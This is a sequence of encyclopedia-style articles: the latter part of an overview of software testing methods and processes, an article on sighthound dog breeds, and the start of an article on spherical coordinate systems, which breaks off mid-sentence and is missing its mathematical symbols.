executed to complete the test Decision coverage, which reports on whether both the True and the False branch of a given test has been executed 100% statement coverage ensures that all code paths or branches (in terms of control flow) are executed at least once. This is helpful in ensuring correct functionality, but not sufficient since the same code may process different inputs correctly or incorrectly. Black-box testing Black-box testing (also known as functional testing) describes designing test cases without knowledge of the implementation, without reading the source code. The testers are only aware of what the software is supposed to do, not how it does it. Black-box testing methods include: equivalence partitioning, boundary value analysis, all-pairs testing, state transition tables, decision table testing, fuzz testing, model-based testing, use case testing, exploratory testing, and specification-based testing. Specification-based testing aims to test the functionality of software according to the applicable requirements. This level of testing usually requires thorough test cases to be provided to the tester, who then can simply verify that for a given input, the output value (or behavior), either "is" or "is not" the same as the expected value specified in the test case. Test cases are built around specifications and requirements, i.e., what the application is supposed to do. It uses external descriptions of the software, including specifications, requirements, and designs, to derive test cases. These tests can be functional or non-functional, though usually functional. Specification-based testing may be necessary to assure correct functionality, but it is insufficient to guard against complex or high-risk situations. Black box testing can be used to any level of testing although usually not at the unit level. Component interface testing Component interface testing is a variation of black-box testing, with the focus on the data values beyond just the related actions of a subsystem component. The practice of component interface testing can be used to check the handling of data passed between various units, or subsystem components, beyond full integration testing between those units. The data being passed can be considered as "message packets" and the range or data types can be checked for data generated from one unit and tested for validity before being passed into another unit. One option for interface testing is to keep a separate log file of data items being passed, often with a timestamp logged to allow analysis of thousands of cases of data passed between units for days or weeks. Tests can include checking the handling of some extreme data values while other interface variables are passed as normal values. Unusual data values in an interface can help explain unexpected performance in the next unit. Visual testing The aim of visual testing is to provide developers with the ability to examine what was happening at the point of software failure by presenting the data in such a way that the developer can easily find the information he or she requires, and the information is expressed clearly. At the core of visual testing is the idea that showing someone a problem (or a test failure), rather than just describing it, greatly increases clarity and understanding. Visual testing, therefore, requires the recording of the entire test process – capturing everything that occurs on the test system in video format. Output videos are supplemented by real-time tester input via picture-in-a-picture webcam and audio commentary from microphones. Visual testing provides a number of advantages. The quality of communication is increased drastically because testers can show the problem (and the events leading up to it) to the developer as opposed to just describing it, and the need to replicate test failures will cease to exist in many cases. The developer will have all the evidence he or she requires of a test failure and can instead focus on the cause of the fault and how it should be fixed. Ad hoc testing and exploratory testing are important methodologies for checking software integrity because they require less preparation time to implement, while the important bugs can be found quickly. In ad hoc testing, where testing takes place in an improvised impromptu way, the ability of the tester(s) to base testing off documented methods and then improvise variations of those tests can result in a more rigorous examination of defect fixes. However, unless strict documentation of the procedures is maintained, one of the limits of ad hoc testing is lack of repeatability. Grey-box testing Grey-box testing (American spelling: gray-box testing) involves using knowledge of internal data structures and algorithms for purposes of designing tests while executing those tests at the user, or black-box level. The tester will often have access to both "the source code and the executable binary." Grey-box testing may also include reverse engineering (using dynamic code analysis) to determine, for instance, boundary values or error messages. Manipulating input data and formatting output do not qualify as grey-box, as the input and output are clearly outside of the "black box" that we are calling the system under test. This distinction is particularly important when conducting integration testing between two modules of code written by two different developers, where only the interfaces are exposed for the test. By knowing the underlying concepts of how the software works, the tester makes better-informed testing choices while testing the software from outside. Typically, a grey-box tester will be permitted to set up an isolated testing environment with activities, such as seeding a database. The tester can observe the state of the product being tested after performing certain actions such as executing SQL statements against the database and then executing queries to ensure that the expected changes have been reflected. Grey-box testing implements intelligent test scenarios based on limited information. This will particularly apply to data type handling, exception handling, and so on. With the concept of grey-box testing, this "arbitrary distinction" between black- and white-box testing has faded somewhat. Installation testing Compatibility testing A common cause of software failure (real or perceived) is a lack of its compatibility with other application software, operating systems (or operating system versions, old or new), or target environments that differ greatly from the original (such as a terminal or GUI application intended to be run on the desktop now being required to become a Web application, which must render in a Web browser). For example, in the case of a lack of backward compatibility, this can occur because the programmers develop and test software only on the latest version of the target environment, which not all users may be running. This results in the unintended consequence that the latest work may not function on earlier versions of the target environment, or on older hardware that earlier versions of the target environment were capable of using. Sometimes such issues can be fixed by proactively abstracting operating system functionality into a separate program module or library. Smoke and sanity testing Sanity testing determines whether it is reasonable to proceed with further testing. Smoke testing consists of minimal attempts to operate the software, designed to determine whether there are any basic problems that will prevent it from working at all. Such tests can be used as build verification test. Regression testing Regression testing focuses on finding defects after a major code change has occurred. Specifically, it seeks to uncover software regressions, as degraded or lost features, including old bugs that have come back. Such regressions occur whenever software functionality that was previously working correctly, stops working as intended. Typically, regressions occur as an unintended consequence of program changes, when the newly developed part of the software collides with the previously existing code. Regression testing is typically the largest test effort in commercial software development, due to checking numerous details in prior software features, and even new software can be developed while using some old test cases to test parts of the new design to ensure prior functionality is still supported. Common methods of regression testing include re-running previous sets of test cases and checking whether previously fixed faults have re-emerged. The depth of testing depends on the phase in the release process and the risk of the added features. They can either be complete, for changes added late in the release or deemed to be risky, or be very shallow, consisting of positive tests on each feature, if the changes are early in the release or deemed to be of low risk. Acceptance testing Acceptance testing is system-level testing to ensure the software meets customer expectations. Acceptance testing may be performed as part of the hand-off process between any two phases of development. Tests are frequently grouped into these levels by where they are performed in the software development process, or by the level of specificity of the test. User acceptance testing (UAT) Operational acceptance testing (OAT) Contractual and regulatory acceptance testing Alpha and beta testing Sometimes, UAT is performed by the customer, in their environment and on their own hardware. OAT is used to conduct operational readiness (pre-release) of a product, service or system as part of a quality management system. OAT is a common type of non-functional software testing, used mainly in software development and software maintenance projects. This type of testing focuses on the operational readiness of the system to be supported, or to become part of the production environment. Hence, it is also known as operational readiness testing (ORT) or operations readiness and assurance (OR&A) testing. Functional testing within OAT is limited to those tests that are required to verify the non-functional aspects of the system. In addition, the software testing should ensure that the portability of the system, as well as working as expected, does not also damage or partially corrupt its operating environment or cause other processes within that environment to become inoperative. Contractual acceptance testing is performed based on the contract's acceptance criteria defined during the agreement of the contract, while regulatory acceptance testing is performed based on the relevant regulations to the software product. Both of these two tests can be performed by users or independent testers. Regulation acceptance testing sometimes involves the regulatory agencies auditing the test results. Alpha testing Alpha testing is simulated or actual operational testing by potential users/customers or an independent test team at the developers' site. Alpha testing is often employed for off-the-shelf software as a form of internal acceptance testing before the software goes to beta testing. Beta testing Beta testing comes after alpha testing and can be considered a form of external user acceptance testing. Versions of the software, known as beta versions, are released to a limited audience outside of the programming team known as beta testers. The software is released to groups of people so that further testing can ensure the product has few faults or bugs. Beta versions can be made available to the open public to increase the feedback field to a maximal number of future users and to deliver value earlier, for an extended or even indefinite period of time (perpetual beta). Functional vs non-functional testing Functional testing refers to activities that verify a specific action or function of the code. These are usually found in the code requirements documentation, although some development methodologies work from use cases or user stories. Functional tests tend to answer the question of "can the user do this" or "does this particular feature work." Non-functional testing refers to aspects of the software that may not be related to a specific function or user action, such as scalability or other performance, behavior under certain constraints, or security. Testing will determine the breaking point, the point at which extremes of scalability or performance leads to unstable execution. Non-functional requirements tend to be those that reflect the quality of the product, particularly in the context of the suitability perspective of its users. Continuous testing Continuous testing is the process of executing automated tests as part of the software delivery pipeline to obtain immediate feedback on the business risks associated with a software release candidate. Continuous testing includes the validation of both functional requirements and non-functional requirements; the scope of testing extends from validating bottom-up requirements or user stories to assessing the system requirements associated with overarching business goals. Destructive testing Destructive testing attempts to cause the software or a sub-system to fail. It verifies that the software functions properly even when it receives invalid or unexpected inputs, thereby establishing the robustness of input validation and error-management routines. Software fault injection, in the form of fuzzing, is an example of failure testing. Various commercial non-functional testing tools are linked from the software fault injection page; there are also numerous open-source and free software tools available that perform destructive testing. Software performance testing Performance testing is generally executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload. It can also serve to investigate, measure, validate or verify other quality attributes of the system, such as scalability, reliability and resource usage. Load testing is primarily concerned with testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number of users. This is generally referred to as software scalability. The related load testing activity of when performed as a non-functional activity is often referred to as endurance testing. Volume testing is a way to test software functions even when certain components (for example a file or database) increase radically in size. Stress testing is a way to test reliability under unexpected or rare workloads. Stability testing (often referred to as load or endurance testing) checks to see if the software can continuously function well in or above an acceptable period. There is little agreement on what the specific goals of performance testing are. The terms load testing, performance testing, scalability testing, and volume testing, are often used interchangeably. Real-time software systems have strict timing constraints. To test if timing constraints are met, real-time testing is used. Usability testing Usability testing is to check if the user interface is easy to use and understand. It is concerned mainly with the use of the application. This is not a kind of testing that can be automated; actual human users are needed, being monitored by skilled UI designers. Accessibility testing Accessibility testing is done to ensure that the software is accessible to persons with disabilities. Some of the common web accessibility tests are Ensuring that the color contrast between the font and the background color is appropriate Font Size Alternate Texts for multimedia content Ability to use the system using the computer keyboard in addition to the mouse. Common standards for compliance Americans with Disabilities Act of 1990 Section 508 Amendment to the Rehabilitation Act of 1973 Web Accessibility Initiative (WAI) of the World Wide Web Consortium (W3C) Security testing Security testing is essential for software that processes confidential data to prevent system intrusion by hackers. The International Organization for Standardization (ISO) defines this as a "type of testing conducted to evaluate the degree to which a test item, and associated data and information, are protected so that unauthorised persons or systems cannot use, read or modify them, and authorized persons or systems are not denied access to them." Internationalization and localization Testing for internationalization and localization validates that the software can be used with different languages and geographic regions. The process of pseudolocalization is used to test the ability of an application to be translated to another language, and make it easier to identify when the localization process may introduce new bugs into the product. Globalization testing verifies that the software is adapted for a new culture, such as different currencies or time zones. Actual translation to human languages must be tested, too. Possible localization and globalization failures include: Some messages may be untranslated. Software is often localized by translating a list of strings out of context, and the translator may choose the wrong translation for an ambiguous source string. Technical terminology may become inconsistent, if the project is translated by several people without proper coordination or if the translator is imprudent. Literal word-for-word translations may sound inappropriate, artificial or too technical in the target language. Untranslated messages in the original language may be hard coded in the source code, and thus untranslatable. Some messages may be created automatically at run time and the resulting string may be ungrammatical, functionally incorrect, misleading or confusing. Software may use a keyboard shortcut that has no function on the source language's keyboard layout, but is used for typing characters in the layout of the target language. Software may lack support for the character encoding of the target language. Fonts and font sizes that are appropriate in the source language may be inappropriate in the target language; for example, CJK characters may become unreadable if the font is too small. A string in the target language may be longer than the software can handle. This may make the string partly invisible to the user or cause the software to crash or malfunction. Software may lack proper support for reading or writing bi-directional text. Software may display images with text that was not localized. Localized operating systems may have differently named system configuration files and environment variables and different formats for date and currency. Development testing Development testing is a software development process that involves the synchronized application of a broad spectrum of defect prevention and detection strategies in order to reduce software development risks, time, and costs. It is performed by the software developer or engineer during the construction phase of the software development lifecycle. Development testing aims to eliminate construction errors before code is promoted to other testing; this strategy is intended to increase the quality of the resulting software as well as the efficiency of the overall development process. Depending on the organization's expectations for software development, development testing might include static code analysis, data flow analysis, metrics analysis, peer code reviews, unit testing, code coverage analysis, traceability, and other software testing practices. A/B testing A/B testing is a method of running a controlled experiment to determine if a proposed change is more effective than the current approach. Customers are routed to either a current version (control) of a feature, or to a modified version (treatment) and data is collected to determine which version is better at achieving the desired outcome. Concurrent testing Concurrent or concurrency testing assesses the behaviour and performance of software and systems that use concurrent computing, generally under normal usage conditions. Typical problems this type of testing will expose are deadlocks, race conditions and problems with shared memory/resource handling. Conformance testing or type testing In software testing, conformance testing verifies that a product performs according to its specified standards. Compilers, for instance, are extensively tested to determine whether they meet the recognized standard for that language. Output comparison testing Creating a display expected output, whether as data comparison of text or screenshots of the UI, is sometimes called snapshot testing or Golden Master Testing unlike many other forms of testing, this cannot detect failures automatically and instead requires that a human evaluate the output for inconsistencies. Property testing Property testing is a testing technique where, instead of asserting that specific inputs produce specific expected outputs, the practitioner randomly generates many inputs, runs the program on all of them, and asserts the truth of some "property" that should be true for every pair of input and output. For example, every output from a serialization function should be accepted by the corresponding deserialization function, and every output from a sort function should be a monotonically increasing list containing exactly the same elements as its input. Property testing libraries allow the user to control the strategy by which random inputs are constructed, to ensure coverage of degenerate cases, or inputs featuring specific patterns that are needed to fully exercise aspects of the implementation under test. Property testing is also sometimes known as "generative testing" or "QuickCheck testing" since it was introduced and popularized by the Haskell library QuickCheck. Metamorphic testing Metamorphic testing (MT) is a property-based software testing technique, which can be an effective approach for addressing the test oracle problem and test case generation problem. The test oracle problem is the difficulty of determining the expected outcomes of selected test cases or to determine whether the actual outputs agree with the expected outcomes. VCR testing VCR testing, also known as "playback testing" or "record/replay" testing, is a testing technique for increasing the reliability and speed of regression tests that involve a component that is slow or unreliable to communicate with, often a third-party API outside of the tester's control. It involves making a recording ("cassette") of the system's interactions with the external component, and then replaying the recorded interactions as a substitute for communicating with the external system on subsequent runs of the test. The technique was popularized in web development by the Ruby library vcr. Teamwork Roles In an organization, testers may be in a separate team from the rest of the software development team or they may be integrated into one team. Software testing can also be performed by non-dedicated software testers. In the 1980s, the term software tester started to be used to denote a separate profession. Notable software testing roles and titles include: test manager, test lead, test analyst, test designer, tester, automation developer, and test administrator. Processes Organizations that develop software, perform testing differently, but there are common patterns. Waterfall development In waterfall development, testing is generally performed after the code is completed, but before the product is shipped to the customer. This practice often results in the testing phase being used as a project buffer to compensate for project delays, thereby compromising the time devoted to testing. Some contend that the waterfall process allows for testing to start when the development project starts and to be a continuous process until the project finishes. Agile development Agile software development commonly involves testing while the code is being written and organizing teams with both programmers and testers and with team members performing both programming and testing. One agile practice, test-driven software development (TDD), is a way of unit testing such that unit-level testing is performed while writing the product code. Test code is updated as new features are added and failure conditions are discovered (bugs fixed). Commonly, the unit test code is maintained with the project code, integrated in the build process, and run on each build and as part of regression testing. Goals of this continuous integration is to support development and reduce defects. Even in organizations that separate teams by programming and testing functions, many often have the programmers perform unit testing. Sample process The sample below is common for waterfall development. The same activities are commonly found in other development models, but might be described differently. Requirements analysis: testing should begin in the requirements phase of the software development life cycle. During the design phase, testers work to determine what aspects of a design are testable and with what parameters those tests work. Test planning: test strategy, test plan, testbed creation. Since many activities will be carried out during testing, a plan is needed. Test development: test procedures, test scenarios, test cases, test datasets, test scripts to use in testing software. Test execution: testers execute the software based on the plans and test documents then report any errors found to the development team. This part could be complex when running tests with a lack of programming knowledge. Test reporting: once testing is completed, testers generate metrics and make final reports on their test effort and whether or not the software tested is ready for release. Test result analysis: or defect analysis, is done by the development team usually along with the client, in order to decide what defects should be assigned, fixed, rejected (i.e. found software working properly) or deferred to be dealt with later. Defect retesting: once a defect has been dealt with by the development team, it is retested by the testing team. Regression testing: it is common to have a small test program built of a subset of tests, for each integration of new, modified, or fixed software, in order to ensure that the latest delivery has not ruined anything and that the software product as a whole is still working correctly. Test closure: once the test meets the exit criteria, the activities such as capturing the key outputs, lessons learned, results, logs, documents related to the project are archived and used as a reference for future projects. Quality Software verification and validation Software testing is used in association with verification and validation: Verification: Have we built the software right? (i.e., does it implement the requirements). Validation: Have we built the right software? (i.e., do the deliverables satisfy the customer). The terms verification and validation are commonly used interchangeably in the industry; it is also common to see these two terms defined with contradictory definitions. According to the IEEE Standard Glossary of Software Engineering Terminology: Verification is the process of evaluating a system or component to determine whether the products of a given development phase satisfy the conditions imposed at the start of that phase. Validation is the process of evaluating a system or component during or at the end of the development process to determine whether it satisfies specified requirements. And, according to the ISO 9000 standard: Verification is confirmation by examination and through provision of objective evidence that specified requirements have been fulfilled. Validation is confirmation by examination and through provision of objective evidence that the requirements for a specific intended use or application have been fulfilled. The contradiction is caused by the use of the concepts of requirements and specified requirements but with different meanings. In the case of IEEE standards, the specified requirements, mentioned in the definition of validation, are the set of problems, needs and wants of the stakeholders that the software must solve and satisfy. Such requirements are documented in a Software Requirements Specification (SRS). And, the products mentioned in the definition of verification, are the output artifacts of every phase of the software development process. These products are, in fact, specifications such as Architectural Design Specification, Detailed Design Specification, etc. The SRS is also a specification, but it cannot be verified (at least not in the sense used here, more on this subject below). But, for the ISO 9000, the specified requirements are the set of specifications, as just mentioned above, that must be verified. A specification, as previously explained, is the product of a software development process phase that receives another specification as input. A specification is verified successfully when it correctly implements its input specification. All the specifications can be verified except the SRS because it is the first one (it can be validated, though). Examples: The Design Specification must implement the SRS; and, the Construction phase artifacts must implement the Design Specification. So, when these words are defined in common terms, the apparent contradiction disappears. Both the SRS and the software must be validated. The SRS can be validated statically by consulting with the stakeholders. Nevertheless, running some partial implementation of the software or a prototype of any kind (dynamic testing) and obtaining positive feedback from them, can further increase the certainty that the SRS is correctly formulated. On the other hand, the software, as a final and running product (not its artifacts and documents, including the source code) must be validated dynamically with the stakeholders by executing the software and having them to try it. Some might argue that, for SRS, the input is the words of stakeholders and, therefore, SRS validation is the same as SRS verification. Thinking this way is not advisable as it only causes more confusion. It is better to think of verification as a process involving a formal and technical input document. Software quality assurance In some organizations, software testing is part of a software quality assurance (SQA) process. In SQA, software process specialists and auditors are concerned with the software development process rather than just the artifacts such as documentation, code and systems. They examine and change the software engineering process itself to reduce the number of faults that end up in the delivered software: the so-called defect rate. What constitutes an acceptable defect rate depends on the nature of the software; a flight simulator video game would have much higher defect tolerance than software for an actual airplane. Although there are close links with SQA, testing departments often exist independently, and there may be no SQA function in some companies. Software testing is an activity to investigate software under test in order to provide quality-related information to stakeholders. By contrast, QA (quality assurance) is the implementation of policies and procedures intended to prevent defects from reaching customers. Measures Quality measures include such topics as correctness, completeness, security and ISO/IEC 9126 requirements such as capability, reliability, efficiency, portability, maintainability, compatibility, and usability. There are a number of frequently used software metrics, or measures, which are used to assist in determining the state of the software or the adequacy of the testing. Artifacts A software testing process can produce several artifacts. The actual artifacts produced are a factor of the software development model used, stakeholder and organisational needs. Test plan A test plan is a document detailing the approach that will be taken for intended test activities. The plan may include aspects such as objectives, scope, processes and procedures, personnel requirements, and contingency plans. The test plan could come in the form of a single plan that includes all test types (like an acceptance or system test plan) and planning considerations, or it may be issued as a master test plan that provides an overview of more than one detailed test plan (a plan of a plan). A test plan can be, in some cases, part of a wide "test strategy" which documents overall testing approaches, which may itself be a master test plan or even a separate artifact. Traceability matrix Test case A test case normally consists of a unique identifier, requirement references from a design specification, preconditions, events, a series of steps (also known as actions) to follow, input, output, expected result, and the actual result. Clinically defined, a test case is an input and an expected result. This can be as terse as "for condition x your derived result is y", although normally test cases describe in more detail the input scenario and what results might be expected. It can occasionally be a series of steps (but often steps are contained in a separate test procedure that can be exercised against multiple test cases, as a matter of economy) but with one expected result or expected outcome. The optional fields are a test case ID, test step, or order of execution number, related requirement(s), depth, test category, author, and check boxes for whether the test is automatable and has been automated. Larger test cases may also contain prerequisite states or steps, and descriptions. A test case should also contain a place for the actual result. These steps can be stored in a word processor document, spreadsheet, database, or other common repositories. In a database system, you may also be able to see past test results, who generated the results, and what system configuration was used to generate those results. These past results would usually be stored in a separate table. Test script A test script is a procedure or programming code that replicates user actions. Initially, the term was derived from the product of work created by automated regression test tools. A test case will be a baseline to create test scripts using a tool or a program. Test suite Test fixture or test data In most cases, multiple sets of values or data are used to test the same functionality of a particular feature. All the test values and changeable environmental components are collected in separate files and stored as test data. It is also useful to provide this data to the client and with the product or a project. There are techniques to generate Test data. Test harness The software, tools, samples of data input and output, and configurations are all referred to collectively as a test harness. Test run A test run is a collection of test cases or test suites that the user is executing and comparing the expected with the actual results. Once complete, a report or all executed tests may be generated. Certifications Several certification programs exist to support the professional aspirations of software testers and quality assurance specialists. A few practitioners argue that the testing field is not ready for certification, as mentioned in the controversy section. Controversy Some of the major software testing controversies include: Agile vs. traditional Should testers learn to work under conditions of uncertainty and constant change or should they aim at process "maturity"? The agile testing movement has received growing popularity since the early 2000s mainly in commercial circles, whereas government and military software providers use this methodology but also the traditional test-last models (e.g., in the Waterfall model). Manual vs. automated testing Some writers believe that test automation is so expensive relative to its value that it should be used sparingly. The test automation then can be considered as a way to capture and implement the requirements. As a general rule, the larger the system and the greater the complexity, the greater the ROI in test automation. Also, the investment in tools and expertise can be amortized over multiple projects with the right level of knowledge sharing within an organization. Is the existence of the ISO 29119 software testing standard justified? Significant opposition has formed out of the ranks of the context-driven school of software testing about the ISO 29119 standard. Professional testing associations, such as the International Society for Software Testing, have attempted to have the standard withdrawn. Some practitioners declare that the testing field is not ready for certification No certification now offered actually requires the applicant to show their ability to test software. No certification is based on a widely accepted body of knowledge. Certification itself cannot measure an individual's productivity, their skill, or practical knowledge, and cannot guarantee their competence, or professionalism as a tester. Studies used to show the relative expense of fixing defects There are opposing views on the applicability of studies used to show the relative expense of fixing defects depending on their introduction and detection. For example: It is commonly believed that the earlier a defect is found, the cheaper it is to fix it. The following table shows the cost of fixing the defect depending on the stage it was found. For example, if a problem in the requirements is found only post-release, then it would cost 10–100 times more to fix than if it had already been found by the requirements review. With the advent of modern continuous deployment practices and cloud-based services, the cost of re-deployment and maintenance may lessen over time. The data from which this table is extrapolated is scant. Laurent Bossavit says in his analysis: The "smaller projects" curve turns out to be from only two teams of first-year students, a sample size so small that extrapolating to "smaller projects in general" is totally indefensible. The GTE study does not explain its data, other than to say it came from two projects, one large and one small. The paper cited for the Bell Labs "Safeguard" project specifically disclaims having collected the fine-grained data that Boehm's data points suggest. The IBM study (Fagan's paper) contains claims that seem to contradict Boehm's graph and no numerical results that clearly correspond to his data points. Boehm doesn't even cite a paper for the TRW data, except when writing for "Making Software" in 2010, and there he cited the original 1976 article. There exists a large study conducted at TRW at the right time for Boehm to cite it, but that paper doesn't contain the sort of data that would support Boehm's claims.
Technology
Software development: General
null
29163
https://en.wikipedia.org/wiki/Sighthound
Sighthound
Sighthounds (also called gazehounds) are a type of hound dog that hunts primarily by sight and speed, unlike scent hounds, which rely on scent and endurance. Appearance These dogs specialize in pursuing prey, keeping it in sight, and overpowering it by their great speed and agility. They must be able to detect motion quickly, so they have keen vision. Sighthounds must be able to capture fast, agile prey, such as deer and hares, so they have a very flexible back and long legs for a long stride, a deep chest to support an unusually (compared to other dogs) large heart, very efficient lungs for both anaerobic and aerobic sprints, and a lean, wiry body to keep their weight at a minimum. Sighthounds have unique anatomical and physiological features, likely due to intentional selection for hunting by speed and sight; laboratory studies have established reference intervals for hematology and serum biochemical profiles in sighthounds, some of which are shared by all sighthounds and some of which may be unique to one breed. The typical sighthound type has a light, lean head, which is dolichocephalic in proportion. This shape can create the illusion that their heads are longer than usual. Wolves and other wild dogs are dolichocephalic or mesaticephalic, but some domestic dogs have become brachycephalic (short-headed) due to artificial selection by humans over the course of 12,000 years. Dolichocephalic dogs have a wider field of vision but smaller overlap between the eyes and therefore possibly poorer depth perception in some of their field of view than brachycephalic dogs; most, if not all, dogs have less visual acuity than their antecedent, the wolf. There is no science-based evidence to confirm the popular belief that sighthounds have a higher visual acuity than other types of dogs. However, there is increasing evidence that dolichocephalic dogs, thanks to a higher number of retinal ganglion cells in their “visual streak”, retain more heightened sensitivity than other dog types to objects and rapid movement in the horizontal field of vision. History Sighthounds such as the Saluki/Sloughi type (both named after the Seleucid Empire) may have existed for at least 5,000 years, with the earliest presumed sighthound remains of a male with a shoulder height around 54 cm, comparable to a Saluki, appearing in the excavations of Tell Brak dated approximately 4,000 years before present. The earliest complete European description of a sighthound and its work, the Celtic vertragus from Roman Spain of the 2nd century C.E., comes from Arrian's Cynegeticus. A similar type, possibly a moderately sized male sighthound, with a height of 61–63 cm, of approximately the same historic period, the Warmington Roman dog is described from a well-preserved skeleton found in England. Sighthound type "gracile" bones, dating from the 8th to 9th century CE, anatomically defined as those of a 70 cm (28 in) high "greyhound", were genetically compared with the modern Greyhound and other sighthounds and found to be almost identical with the modern Greyhound breed, with the exception of only four deletions and one substitution in the DNA sequences, which were interpreted as differences probably arising from 11 centuries of breeding of this type of sighthound. Population genomic analysis proposes that true sighthounds originated independently from native dogs and were comprehensively admixed among breeds, supporting the multiple origins hypothesis of sighthounds. Although today most sighthounds are kept primarily as pets, some of them may have been bred for as many as thousands of years to detect movement of prey, then chase, capture, and kill it primarily by speed. They thrive on physical activity. Some have mellow personalities, others are watchful or even hostile towards strangers, but the instinct to chase running animals remains strong. Apart from coursing and hunting, various dog sports are practiced with purebred sighthounds, and sometimes with lurchers and longdogs. Such sports include racing, lure coursing, and other events. List of sighthound breeds Afghan Hound Azawakh Borzoi Chippiparai Chortai Galgo Español Greyhound Irish Wolfhound Italian Greyhound Kaikadi Kanni Kazakh Tazy Kombai Levriero Sardo Magyar agár Mudhol Hound Old Croatian Sighthound Patagonian Greyhound Polish Greyhound Rajapalayam Rampur Greyhound Rhodesian Ridgeback Saluki Scottish Deerhound Silken Windhound Sloughi Taigan Whippet Xigou Crossbreed sighthound types Kangaroo hound Longdog Lurcher American Staghound Breeds considered to be controversial, not having by origin a sighthound function A number of breeds or types of dogs which do not hunt solely by speed and sight, as well as a number of non-hunting breeds, are currently being recognized as sighthounds, either formally or informally by kennel clubs, or lure and live coursing clubs. These include: Andalusian Hound Basenji Cirneco dell'Etna Ibizan Hound (Podenco Ibicenco) Peruvian Inca Orchid Pharaoh Hound (Kelb tal-fenek) Podenco Canario Portuguese Podengo Rhodesian Ridgeback Thai Ridgeback Kennel club classification When competing in conformation shows, most Anglophone kennel clubs, including the American Kennel Club and The Kennel Club (UK), group pedigree sighthound breeds together with scent hounds in a Hound Group, the Fédération Cynologique Internationale groups them in a dedicated Sighthound Group, whilst the United Kennel Club groups them in a Sighthound and Pariah Group.
Biology and health sciences
Dogs
Animals
29181
https://en.wikipedia.org/wiki/Spherical%20coordinate%20system
Spherical coordinate system
In mathematics, a spherical coordinate system specifies a given point in three-dimensional space by using a distance and two angles as its three coordinates. These are the radial distance along the line connecting the point to a fixed point called the origin; the polar angle between this radial line and a given polar axis; and the azimuthal angle , which is the angle of rotation of the radial line around the polar axis. (See graphic regarding the "physics convention".) Once the radius is fixed, the three coordinates (r, θ, φ), known as a 3-tuple, provide a coordinate system on a sphere, typically called the spherical polar coordinates. The plane passing through the origin and perpendicular to the polar axis (where the polar angle is a right angle) is called the reference plane (sometimes fundamental plane). Terminology The radial distance from the fixed point of origin is also called the radius, or radial line, or radial coordinate. The polar angle may be called inclination angle, zenith angle, normal angle, or the colatitude. The user may choose to replace the inclination angle by its complement, the elevation angle (or altitude angle), measured upward between the reference plane and the radial linei.e., from the reference plane upward (towards to the positive z-axis) to the radial line. The depression angle is the negative of the elevation angle. (See graphic re the "physics convention"not "mathematics convention".) Both the use of symbols and the naming order of tuple coordinates differ among the several sources and disciplines. This article will use the ISO convention frequently encountered in physics, where the naming tuple gives the order as: radial distance, polar angle, azimuthal angle, or . (See graphic re the "physics convention".) In contrast, the conventions in many mathematics books and texts give the naming order differently as: radial distance, "azimuthal angle", "polar angle", and or which switches the uses and meanings of symbols θ and φ. Other conventions may also be used, such as r for a radius from the z-axis that is not from the point of origin. Particular care must be taken to check the meaning of the symbols. According to the conventions of geographical coordinate systems, positions are measured by latitude, longitude, and height (altitude). There are a number of celestial coordinate systems based on different fundamental planes and with different terms for the various coordinates. The spherical coordinate systems used in mathematics normally use radians rather than degrees; (note 90 degrees equals π/2 radians). And these systems of the mathematics convention may measure the azimuthal angle counterclockwise (i.e., from the south direction -axis, or 180°, towards the east direction -axis, or +90°)rather than measure clockwise (i.e., from the north direction x-axis, or 0°, towards the east direction y-axis, or +90°), as done in the horizontal coordinate system. (See graphic re "mathematics convention".) The spherical coordinate system of the physics convention can be seen as a generalization of the polar coordinate system in three-dimensional space. It can be further extended to higher-dimensional spaces, and is then referred to as a hyperspherical coordinate system. Definition To define a spherical coordinate system, one must designate an origin point in space, , and two orthogonal directions: the zenith reference direction and the azimuth reference direction. These choices determine a reference plane that is typically defined as containing the point of origin and the x and yaxes, either of which may be designated as the azimuth reference direction. The reference plane is perpendicular (orthogonal) to the zenith direction, and typically is designated "horizontal" to the zenith direction's "vertical". The spherical coordinates of a point then are defined as follows: The radius or radial distance is the Euclidean distance from the origin to . The inclination (or polar angle) is the signed angle from the zenith reference direction to the line segment . (Elevation may be used as the polar angle instead of inclination; see below.) The azimuth (or azimuthal angle) is the signed angle measured from the azimuth reference direction to the orthogonal projection of the radial line segment on the reference plane. The sign of the azimuth is determined by designating the rotation that is the positive sense of turning about the zenith. This choice is arbitrary, and is part of the coordinate system definition. (If the inclination is either zero or 180 degrees (= radians), the azimuth is arbitrary. If the radius is zero, both azimuth and inclination are arbitrary.) The elevation is the signed angle from the x-y reference plane to the radial line segment , where positive angles are designated as upward, towards the zenith reference. Elevation is 90 degrees (= radians) minus inclination. Thus, if the inclination is 60 degrees (= radians), then the elevation is 30 degrees (= radians). In linear algebra, the vector from the origin to the point is often called the position vector of P. Conventions Several different conventions exist for representing spherical coordinates and prescribing the naming order of their symbols. The 3-tuple number set denotes radial distance, the polar angle"inclination", or as the alternative, "elevation"and the azimuthal angle. It is the common practice within the physics convention, as specified by ISO standard 80000-2:2019, and earlier in ISO 31-11 (1992). As stated above, this article describes the ISO "physics convention"unless otherwise noted. However, some authors (including mathematicians) use the symbol ρ (rho) for radius, or radial distance, φ for inclination (or elevation) and θ for azimuthwhile others keep the use of r for the radius; all which "provides a logical extension of the usual polar coordinates notation". As to order, some authors list the azimuth before the inclination (or the elevation) angle. Some combinations of these choices result in a left-handed coordinate system. The standard "physics convention" 3-tuple set conflicts with the usual notation for two-dimensional polar coordinates and three-dimensional cylindrical coordinates, where is often used for the azimuth. Angles are typically measured in degrees (°) or in radians (rad), where 360° = 2 rad. The use of degrees is most common in geography, astronomy, and engineering, where radians are commonly used in mathematics and theoretical physics. The unit for radial distance is usually determined by the context, as occurs in applications of the 'unit sphere', see applications. When the system is used to designate physical three-space, it is customary to assign positive to azimuth angles measured in the counterclockwise sense from the reference direction on the reference planeas seen from the "zenith" side of the plane. This convention is used in particular for geographical coordinates, where the "zenith" direction is north and the positive azimuth (longitude) angles are measured eastwards from some prime meridian. Note: Easting (), Northing (), Upwardness (). In the case of the local azimuth angle would be measured counterclockwise from to . Unique coordinates Any spherical coordinate triplet (or tuple) specifies a single point of three-dimensional space. On the reverse view, any single point has infinitely many equivalent spherical coordinates. That is, the user can add or subtract any number of full turns to the angular measures without changing the angles themselves, and therefore without changing the point. It is convenient in many contexts to use negative radial distances, the convention being , which is equivalent to or for any , , and . Moreover, is equivalent to . When necessary to define a unique set of spherical coordinates for each point, the user must restrict the range, aka interval, of each coordinate. A common choice is: radial distance: polar angle: , or , azimuth : , or . But instead of the interval , the azimuth is typically restricted to the half-open interval , or radians, 